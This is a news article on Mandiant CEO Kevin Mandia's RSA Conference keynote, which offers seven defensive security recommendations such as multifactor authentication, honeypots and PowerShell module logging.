SAN FRANCISCO — Mandiant CEO Kevin Mandia knows what sets the more defensible and prepared organizations apart from the rest.
The Google-owned incident response firm, which Mandia founded, investigated 1,163 intrusions in 2022 and is currently responding to more than 100 security breaches — fundamental mistakes, oversights and misaligned priorities keep showing up.
“There was a time in my career where if you got hacked and ransomware was deployed, the stigma was you’re not that good at defense. What did you do wrong?” Mandia said Wednesday in a packed Moscone Center keynote hall at the RSA Conference.
There are clear steps organizations can take beyond common safeguards and security tools to strengthen their defenses and increase their chances of detecting, thwarting or minimizing attacks, Mandia said.
Mandia laid out seven pieces of advice to help organizations avoid some of the attacks that might require engagement with Mandiant or other incident response firms.
1. Mine institutional knowledge
“Don’t ever forget the advantage you do have. You should know more about your business, your systems, your topology, your infrastructure than any attacker does,” Mandia said.
With proper structure and an established baseline for normal activities and operations, organizations can detect anomalies faster, Mandia said.
2. Lean on multifactor authentication
“The biggest bang for the buck against any impactful attack is multifactor authentication period,” Mandia said. “Figuring out a way to get it everywhere and know that you have it everywhere with some sort of validation is critical.”
3. Build honeypots
Honeypots, or fake accounts deliberately left untouched by authorized users, are effective at helping organizations detect intrusions or malicious activities that security products can't stop, Mandia said.
4. Study module logging
Bad PowerShell scripts are involved in the second stage of almost every breach Mandiant responds to, according to Mandia. To differentiate good scripts from bad scripts, Mandia advises defenders to turn on and study module logging to gain consistent visibility into PowerShell script use across their organization’s infrastructure.
Organizations must keep a close eye on all identity use, Mandia said.
5. Report risks consistently
The most secure organizations include executives that report risk to boards in a consistent way, Mandia said. This means being repetitive when necessary rather than sharing wildly divergent risk assessments from one board presentation to the next.
6. Identify assets of importance
Security professionals should know the assets that matter most to an organization, and regularly gauge the potential risks confronting those assets, Mandia said.
Mandia recommended defenders take this a step further, by engaging in tabletop exercises involving the risks that cause the most worry and potential damage to the organization.
7. Collaborate, and listen
Building off the theme of RSA Conference — "Stronger Together" — Mandia said businesses should regularly participate in some community of their choosing to keep defenders engaged. By sharing and learning from other organization’s security operations, cybersecurity professionals can bolster their organization’s defenses.